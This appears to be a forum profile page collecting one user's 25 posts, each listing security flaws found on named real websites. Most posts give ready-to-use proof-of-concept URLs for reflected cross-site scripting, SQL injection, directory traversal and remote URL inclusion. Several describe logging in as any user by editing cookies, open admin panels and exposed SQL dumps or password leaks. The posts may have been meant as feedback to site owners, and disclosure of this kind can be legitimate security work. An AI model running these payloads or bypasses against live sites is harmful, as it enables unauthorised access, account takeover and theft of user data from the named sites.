
agentsteal

Members
  • Posts: 230
  • Joined
  • Last visited: Never

Everything posted by agentsteal

  1. Array: http://www.blconline.co.uk/whois/index.blc?lookup&domain[]
     Cross Site Scripting: http://www.blconline.co.uk/whois/index.blc?lookup&domain="><marquee><h1>vulnerable</marquee>
     Full Path Disclosure: http://www.blconline.co.uk/directory/dirupdate.php?www[]
     Full Path Disclosure: http://www.blconline.co.uk/login/userpics/delimg.blc
     Full Path Disclosure: http://www.blconline.co.uk/login/userinfo.blc
     Full Path Disclosure: http://www.blconline.co.uk/price/popupprice.blc
     Full Path Disclosure: http://www.blconline.co.uk/inc/right.blc
     Full Path Disclosure: http://www.blconline.co.uk/inc/footer.blc
     Includes Directory: http://www.blconline.co.uk/login/include/
     META Tag Injection: http://www.blconline.co.uk/whois/index.blc?lookup&domain=<meta+http-equiv='Set-cookie'+content='vulnerable=true'>
     URL Inclusion: http://www.blconline.co.uk/directory/dirupdate.php?www=http://www.google.com/
  2. Admin Access: Anyone can access the admin panel.
     Array: http://www.xxxxxxx.co.uk/projects/filehost/admin/bans.php?action=unban&ip[]
     Cross Site Scripting: There is Cross Site Scripting on http://www.xxxxxxx.co.uk/projects/filehost/admin/bans.php if the fields contain code.
     Cross Site Scripting: There is Cross Site Scripting when you register if your username contains </script>code.
     Directory Traversal: There is Directory Traversal if your username contains ../
     Full Path Disclosure: http://www.xxxxxxx.co.uk/projects/filehost/success.php.old
     Full Path Disclosure: http://www.xxxxxxx.co.uk/projects/filehost/admin/bans.php
     Full Path Disclosure: http://www.xxxxxxx.co.uk/projects/filehost/admin/settings.php
     Includes Directory: http://www.xxxxxxx.co.uk/projects/filehost/includes/
     Insecure Cookie: You shouldn't put the username in the cookie.
     SQL Error: There is an SQL Error when you log in if the username contains '
     If your username contains ' when you log in, the page contains an MD5 of your password.
  3. Cross Site Scripting: http://www.helraizer.co.uk/guestbook/ddgb1.php5/"><marquee><h1>vulnerable
     Full Path Disclosure: There is Full Path Disclosure on http://www.helraizer.co.uk/guestbook/config.php if the PHPSESSID cookie contains an invalid value.
     Full Path Disclosure: There is Full Path Disclosure on http://www.helraizer.co.uk/guestbook/ddgb-verify.php if the PHPSESSID cookie contains an invalid value.
  4. Cross Site Scripting: There is Cross Site Scripting in the uploaded files.
     Insecure Cookie: You shouldn't put the password in the cookie.
     Insecure Cookie: You shouldn't put the username in the cookie.
     You can log in as any user by changing the name cookie and the password cookie to their username and password.
  5. Array: http://www.270studios.com/270forums/viewforum.php?f[]
     Array: http://www.270studios.com/270forums/captcha.php?randomkeys[]
     CAPTCHA: The solution for the CAPTCHA is in the source code.
     Cross Site Scripting: http://www.270studios.com/270forums/viewforum.php?f="><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting on http://www.270studios.com/270forums/ucprofile.php if the fields contain "code.
     Full Path Disclosure: http://www.270studios.com/270forums/viewcat.php?c='
     Full Path Disclosure: http://www.270studios.com/270forums/viewforum.php?f='
     User Enumeration: http://www.270studios.com/~mike270
     User Enumeration: http://www.270studios.com/~nobody
     User Enumeration: http://www.270studios.com/~root
  6. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/vehicle_add.php if the fields contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/vehicle_add.php if you submit the same vehicle multiple times.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/ro_start.php if the drop down menu contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/ro_addjob.php if the drop down menus contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/ro_deljob.php if the drop down menus contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_start.php if the drop down menu contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_addpart.php if the drop down menus contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_view.php if the fields contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_view.php if the drop down menu contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_close.php if the drop down menu contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/customer_mod.php if the drop down menu contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/vehicle_mod.php if the drop down menu contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/service_mod.php if the drop down menu contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/parts_mod.php if the drop down menu contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/parts_del.php if the fields contain code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/admin/adduser.php if the fields contain code.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/vehicle_add.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/ro_start.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus on http://www.debianbox.net/sms/ro_addjob.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus on http://www.debianbox.net/sms/ro_deljob.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/pi_start.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus on http://www.debianbox.net/sms/pi_addpart.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/pi_view.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/pi_close.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/customer_mod.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/vehicle_mod.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/service_mod.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/parts_mod.php you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/tune_download.php you can submit arbitrary values.
     Full Path Disclosure: http://www.debianbox.net/sms/home.php
     Full Path Disclosure: http://www.debianbox.net/sms/include/auth.php
     Full Path Disclosure: http://www.debianbox.net/sms/pi_start.php
     Full Path Disclosure: There is Full Path Disclosure on http://www.debianbox.net/sms/tune_add.php if you upload a file.
     Full Path Disclosure: There is Full Path Disclosure on http://www.debianbox.net/sms/tune_download.php if the drop down menu contains an invalid value.
     Includes Directory: http://www.debianbox.net/sms/admin/
     Includes Directory: http://www.debianbox.net/sms/include/
     SQL Error: http://www.debianbox.net/sms/admin/listros_unpaid.php
     SQL Error: http://www.debianbox.net/sms/invoice_start.php
     SQL Error: http://www.debianbox.net/sms/service_add.php
     SQL Error: http://www.debianbox.net/sms/parts_add.php
     SQL Error: http://www.debianbox.net/sms/parts_mod.php
     SQL Error: http://www.debianbox.net/sms/parts_del.php
     SQL Error: http://www.debianbox.net/sms/letter_thankyou.php
     SQL Error: There is an SQL Error if you add a new customer.
     SQL Error: There is an SQL Error if you register the same vehicle multiple times.
     SQL Error: http://www.debianbox.net/sms/pi_created.php
     SQL Error: There is an SQL Error on http://www.debianbox.net/sms/pi_close.php if the drop down menu contains an invalid value.
     SQL Error: There is an SQL Error on http://www.debianbox.net/sms/invoice_paid.php if the fields contain invalid values.
     SQL Error: There is an SQL Error on http://www.debianbox.net/sms/parts_del.php if the fields contain invalid values.
     User Enumeration: http://www.debianbox.net/~justin
  7. Array: http://www.skoogo.com/search.php?search_forum_text[]
     Cross Site Scripting: http://www.skoogo.com/search.php?search_forum_text="><marquee><h1>vulnerable</marquee>
     Drop Down Menu: If you edit the drop down menus on the search page you can submit arbitrary values.
     Full Path Disclosure: http://www.skoogo.com/misc/auto/book_auto.php
     Full Path Disclosure: http://www.skoogo.com/misc/auto/concentration_auto.php
     Full Path Disclosure: http://www.skoogo.com/misc/auto/network_auto.php
     Full Path Disclosure: http://www.skoogo.com/misc/auto/school_auto.php
     Full Path Disclosure: http://www.skoogo.com/misc/auto/test.php
     Full Path Disclosure: http://www.skoogo.com/misc/auto/test_auto.php
     Full Path Disclosure: http://www.skoogo.com/misc/auto/default.php
     Full Path Disclosure: http://www.skoogo.com/userinfo.php?user[]
     Full Path Disclosure: http://www.skoogo.com/register.php?code[]
     Full Path Disclosure: http://www.skoogo.com/search.php?subsearchforum
     Full Path Disclosure: http://www.skoogo.com/templates/filters/filter_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/keywords_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/book/addbook_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/book/book_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/concentration/concentration_news_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/concentration/concentration_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/course/addcourse_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/course/course_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/course/searchcourse_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/network/addnetwork_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/network/network_news_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/filters/network/network_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/editpost_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/newtopic_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/replytopic_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/topiclist_fp_small_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/topiclist_fp_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/topiclist_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/forum/viewtopic_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/index2_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/index3_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/misc/contact_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/misc/forgotpass_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/misc/search_results_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/misc/reportpost_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/misc/search_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/user/login_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/user/main.php
     Full Path Disclosure: http://www.skoogo.com/templates/user/setprofile_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/user/useredit_t.php
     Full Path Disclosure: http://www.skoogo.com/templates/user/userinfo_t.php
     Full Path Disclosure: http://www.skoogo.com/phpinfo.php
     SQL Injection: http://www.skoogo.com/viewtopic.php?action=g&topic=20"+and+"1"="0
     http://www.skoogo.com/viewtopic.php?action=g&topic=20"+and+"1"="1
  8. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/craigmail.php if the craigprofile field contains </textarea>code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the status field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the outAct field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the myAge field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the myAppearance field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the inAct field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the looking field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the minAge field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the maxAge field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the minHeightFt field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the minHeightln field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the maxHeightFt field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the maxHeightln field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the flavor field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the theirConfidence field contains code.
     Drop Down Menu: If you edit the drop down menus on http://www.pquery.com/profile/maker.php you can submit arbitrary values.
     Includes Directory: http://www.pquery.com/profile/
     PHP Source Code Disclosure: http://www.pquery.com/profile/htmlparser.inc
     User Enumeration: http://www.pquery.com/~nobody
     User Enumeration: http://www.pquery.com/~root
  9. User Enumeration: http://www.jobspokhara.com.np/~nobody
     User Enumeration: http://www.jobspokhara.com.np/~root
  10. Array: http://www.vghunter.net/comment.php?gn[]
      Array: http://www.vghunter.net/game.php?gn[]
      Cross Site Scripting: http://www.vghunter.net/game.php?gn='><marquee>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      Directory Traversal: You can make txt files in any directory by posting comments with the gn field set to ../filename.
      Directory Traversal: http://www.vghunter.net/game.php?gn=../../agentsteal
      You can make txt files in http://www.vghunter.net/games/ by posting comments with the gn field set to the filename.
  11. Array: http://www.mcatzone.com/glosslet.php?letter[]
      Array: http://www.mcatzone.com/mark_rand.php?a20[]
      Array: http://www.mcatzone.com/mark_spec.php?answer[]
      Cross Site Scripting: http://www.mcatzone.com/glosslet.php?letter="><marquee>vulnerable</marquee>
      Cross Site Scripting: http://www.mcatzone.com/mark_spec.php?answer=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.mcatzone.com/mark_rand.php?a20=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if the drop down menu on http://www.mcatzone.com/testsetting.php contains code.
      Cross Site Scripting: There is Cross Site Scripting if your username contains code.
      Cross Site Scripting: There is Cross Site Scripting on http://www.mcatzone.com/testsetting.php if the fields contain code.
      Directory Traversal: http://www.mcatzone.com/glosslet.php?letter=../../icons/binary
      Drop Down Menu: If you edit the drop down menu on http://www.mcatzone.com/testsetting.php you can submit arbitrary values.
      Includes Directory: http://www.mcatzone.com/include/
      Maximum Length: If you edit the input boxes on http://www.mcatzone.com/testsetting.php you can remove the maximum lengths.
      PHP Source Code Disclosure: There is PHP Source Code Disclosure on the 404 page.
      SQL Error: There is an SQL Error on http://www.mcatzone.com/testsetting.php if the fields contain invalid values.
      User Enumeration: http://www.mcatzone.com/~root
  12. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
      Cross Site Scripting: There is Cross Site Scripting on the edit profile pages if the fields contain ">code.
      Directory Traversal: http://www.test.gimppro.co.uk/admin/logout.php?p=a/../
      Drop Down Menu: If you edit the drop down menus on the edit profile pages you can submit arbitrary values.
      Drop Down Menu: If you edit the drop down menus on the create counter page you can submit arbitrary values.
      Drop Down Menu: If you edit the drop down menus on the register page you can submit arbitrary values.
      Full Path Disclosure: http://www.test.gimppro.co.uk/admin/logout.php?p[]
      Full Path Disclosure: http://www.test.gimppro.co.uk/footer.php
      Full Path Disclosure: There is Full Path Disclosure if the cookname cookie is an array.
      Full Path Disclosure: There is Full Path Disclosure if the cookpass cookie is an array.
      Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is an array.
      Insecure Cookie: You shouldn't put the password in the cookie.
      Insecure Cookie: You shouldn't put the username in the cookie.
      SQL Error:
      URL Inclusion: http://www.test.gimppro.co.uk/admin/logout.php?p=http://www.google.com/
      User Enumeration: http://www.test.gimppro.co.uk/~root
      You can log in as any user by setting the cookname and cookpass cookies to their username and password hash.
  13. Array: http://php-radio.dream-code.net/index.php?page[]
      Array: http://php-radio.dream-code.net/index.php?station[]
      Array: http://php-radio.dream-code.net/playlist.php?type[]
      Cross Site Scripting: http://php-radio.dream-code.net/index.php?station=</title><marquee><h1>vulnerable
      Cross Site Scripting: http://php-radio.dream-code.net/index.php?station=<marquee><h1>vulnerable
      Directory Traversal: http://php-radio.dream-code.net/index.php?page=a/../index
      Full Path Disclosure: http://php-radio.dream-code.net/pages/playlist.php
      Full Path Disclosure: http://php-radio.dream-code.net/pages/users.php
      Full Path Disclosure: http://php-radio.dream-code.net/pages/stations.php
      Full Path Disclosure: http://php-radio.dream-code.net/pages/admins.php
      Full Path Disclosure: http://php-radio.dream-code.net/pages/addsongs.php
      Full Path Disclosure: http://php-radio.dream-code.net/pages/logout.php
      URL Inclusion: http://php-radio.dream-code.net/index.php?page=http://www.google.com/
      User Enumeration: http://php-radio.dream-code.net/~root
  14. Admin Access: The PHP Source Code Disclosure reveals your password.
      Cross Site Scripting: There is Cross Site Scripting on http://www2.iqlogin.net/mr_layoutguy/intro.php if the fields contain ">code.
      Full Path Disclosure: http://www2.iqlogin.net/admin/
      Full Path Disclosure: http://www2.iqlogin.net/design/submit.php
      Full Path Disclosure: http://www2.iqlogin.net/dsl/page-views.php
      Full Path Disclosure: http://www2.iqlogin.net/download/iql-online-1.1/module.php
      Full Path Disclosure: http://www2.iqlogin.net/inc/modules/member_menu.php
      Full Path Disclosure: http://www2.iqlogin.net/inc/modules/other_menu.php
      Full Path Disclosure: http://www2.iqlogin.net/user/activate.php
      Full Path Disclosure: http://www2.iqlogin.net/inc/modules/users_active.php
      Includes Directory: http://www2.iqlogin.net/inc/
      Includes Directory: http://www2.iqlogin.net/site/
      PHP Source Code Disclosure: There is PHP Source Code Disclosure on multiple pages if you add ~ at the end of the URL.
      SQL Dump: http://www2.iqlogin.net/tables.sql
  15. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      DOS: There is a DOS if you run multiple battles at the same time.
      Maximum Length: If you edit the input boxes you can remove the maximum lengths.
      You can search for contestants that are less than 4 characters by including special characters that Google doesn't use in the search.
  16. Full Path Disclosure: http://www.linuxjobworld.com/profile.php?mode[]
  17. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      Cross Site Scripting: There is Cross Site Scripting if the regex contains ~code~.
      Cross Site Scripting: There is Cross Site Scripting if the haystack contains ~code~.
  18. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      Log: http://www.gfx-depot.com/league/log.txt
  19. Admin Access: You can upload PHP scripts.
      Cross Site Scripting: http://www.flash-portal.org/fp-quick/upload/index.php
      Full Path Disclosure: http://www.flash-portal.org/fp-quick/upload/c.php
      Full Path Disclosure: http://www.flash-portal.org/fp-quick/?page=watch&subID=24
      You can access other users' files by changing the subID in http://www.flash-portal.org/fp-quick/?page=watch&subID=21
  20. Array: http://www.stargateud.com/~remotepa/modules.php?name=News&op=rate_complete&sid=4&score[]
      Array: http://www.stargateud.com/index.php?page[]
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
      Cross Site Scripting: http://www.stargateud.com/index.php?page=battlefield&listpage=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.stargateud.com/~remotepa/modules.php?name=News&op=rate_complete&sid=4&score=<marquee><h1>vulnerable</marquee>
      Directory Traversal: http://www.stargateud.com/index.php?page=../stargateud/rules
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/faq
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/groupcp
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/index
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/login
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/memberlist
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/posting
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/search
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/viewforum
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/viewonline
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/viewtopic
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/privmsg
      Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/profile
      Full Path Disclosure: http://www.stargateud.com/index.php?page=battlefield&listpage[]
      Full Path Disclosure: http://www.stargateud.com/battlefield.php
      Full Path Disclosure: http://www.stargateud.com/report.php
      Full Path Disclosure: http://www.stargateud.com/forgotpass.php
      Full Path Disclosure: http://www.stargateud.com/stats.php
      Full Path Disclosure: http://www.stargateud.com/base.php
      Full Path Disclosure: http://www.stargateud.com/index.php?page=index
      Full Path Disclosure: http://www.stargateud.com/register.php
      Full Path Disclosure: http://www.stargateud.com/players_online.php
      Full Path Disclosure: http://www.stargateud.com/index.php?page=a
      User Enumeration: http://www.stargateud.com/~remotepa
      User Enumeration: http://www.stargateud.com/~root
  21. Array: http://www.knightlyfood.com/food.php?c[]
      Cross Site Scripting: http://www.knightlyfood.com/food.php?c=</title><script>alert(1337)</script>
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
      Cross Site Scripting: There is Cross Site Scripting if your username contains ">code.
      Cross Site Scripting: There is Cross Site Scripting if the reviews contain code.
      Cross Site Scripting: There is Cross Site Scripting on the forgotten password page if the fields contain ">code.
      Drop Down Menu: If you edit the category drop down menu you can submit arbitrary values.
      Full Path Disclosure: http://www.knightlyfood.com/search.php
  22. Admin Access: http://www.commabunny.org/v8/CB_BBS_8.5_20071012.tar.gz contains your password.
      Admin Access: You can upload and delete any files on the server on http://www.commabunny.org/public/pub/.
      Array: http://www.commabunny.org/blog/pt.php?b[]
      Array: http://www.commabunny.org/v8/vt.php?b[]
      Array: http://www.commabunny.org/v8/st.php?b[]
      Full Path Disclosure: http://www.commabunny.org/vt.php
      Full Path Disclosure: http://www.commabunny.org/0.php
      Full Path Disclosure: http://www.commabunny.org/v8/stuff/l.php
      Full Path Disclosure: http://www.commabunny.org/v8/stuff/l_s.php
      Full Path Disclosure: http://www.commabunny.org/v8/stuff/l_t.php
      Full Path Disclosure: http://www.commabunny.org/blog/l.php
      Log: http://www.commabunny.org/v8/admin/p.php
      MySQL Error: http://www.commabunny.org/v8/pt.php
      MySQL Error: http://www.commabunny.org/v8/sp.php
      MySQL Error: http://www.commabunny.org/v8/v.php
      SQL Dump: http://www.commabunny.org/v8/New Text Document.txt
      SQL Error: http://www.commabunny.org/v8/vt.php
      SQL Error: http://www.commabunny.org/v8/st.php
      SQL Injection: http://www.commabunny.org/v8/vt.php?num=186 AND 1=1&b=1
      http://www.commabunny.org/v8/vt.php?num=186 AND 1=2&b=1
      SQL Injection: http://www.commabunny.org/v8/vt.php?num=186&b=1 AND 1=1
      http://www.commabunny.org/v8/vt.php?num=186&b=1 AND 1=2
  23. Full Path Disclosure: There is Full Path Disclosure if you set the PHPSESSID cookie to an invalid value.
      Full Path Disclosure: There is Full Path Disclosure on http://www.fairslice.com/index.php?dest=search if a search contains an invalid character.
  24. Array: http://www.giftpathways.com/wishlist.php?u[]
      Cross Site Scripting: http://www.giftpathways.com/wishlist.php?u=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/wishlist.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/spread.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/login.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable
      Cross Site Scripting: There is Cross Site Scripting if a group ID contains ">code.
      Cross Site Scripting: http://www.giftpathways.com/profile.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/item.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/print.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/statistics.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/groups.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/food.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/activity.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/spread.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/invite.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/lockmembership.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/contact.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
      Cross Site Scripting: There is Cross Site Scripting if your username contains ">code.
      Drop Down Menu: If you edit the drop down menus on the group creation page you can submit arbitrary values.
      SQL Error: http://www.giftpathways.com/login.php/"
      SQL Error: http://www.giftpathways.com/contact.php/"
      SQL Error: http://www.giftpathways.com/groups.php/"
      SQL Error: http://www.giftpathways.com/profile.php/"
      SQL Error: http://www.giftpathways.com/index.php/"
      SQL Error: http://www.giftpathways.com/item.php/"
      SQL Error: http://www.giftpathways.com/print.php/"
      SQL Error: http://www.giftpathways.com/statistics.php/"
      SQL Error: http://www.giftpathways.com/food.php/"
      SQL Error: http://www.giftpathways.com/lockmembership.php/"
      SQL Error: http://www.giftpathways.com/activity.php/"
      SQL Error: http://www.giftpathways.com/spread.php/"
      SQL Error: http://www.giftpathways.com/invite.php/"
      SQL Error: There is a SQL Error if the drop down menus on the group creation page contain invalid values.
      SQL Error: http://www.giftpathways.com/spread.php/"
      SQL Error: http://www.giftpathways.com/wishlist.php?u='
      SQL Error: http://www.giftpathways.com/wishlist.php?u=a
      SQL Error: http://www.giftpathways.com/wishlist.php/"
  25. Cross Site Scripting: http://www.toxicana.com/forum/register.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if the ID_my_site cookie contains code.
      Cross Site Scripting: There is Cross Site Scripting in the forum if a post contains code.
      Cross Site Scripting: There is Cross Site Scripting if your username contains code.
      Cross Site Scripting: http://www.toxicana.com/forum/login.php/"><marquee><h1>vulnerable</marquee>
      Full Path Disclosure: http://www.toxicana.com/forum/view_topic.php?id[]
      Full Path Disclosure: http://www.toxicana.com/forum/view_topic.php?page[]
      Full Path Disclosure: http://www.toxicana.com/forum/members.php?page=a
      Full Path Disclosure: http://www.toxicana.com/forum/edit_topic.php?id
      Full Path Disclosure: http://www.toxicana.com/forum/main_forum.php?page=a
      Full Path Disclosure: http://www.toxicana.com/forum/del_topic.php?id[]
      Insecure Cookie: You shouldn't put the username in the cookie.
      User Enumeration: http://www.toxicana.com/~toxicana
      User Enumeration: http://www.toxicana.com/~root
      You can log in as any member by changing the username cookie to their username.
      You can log in as Array if the ID_my_site cookie is an array.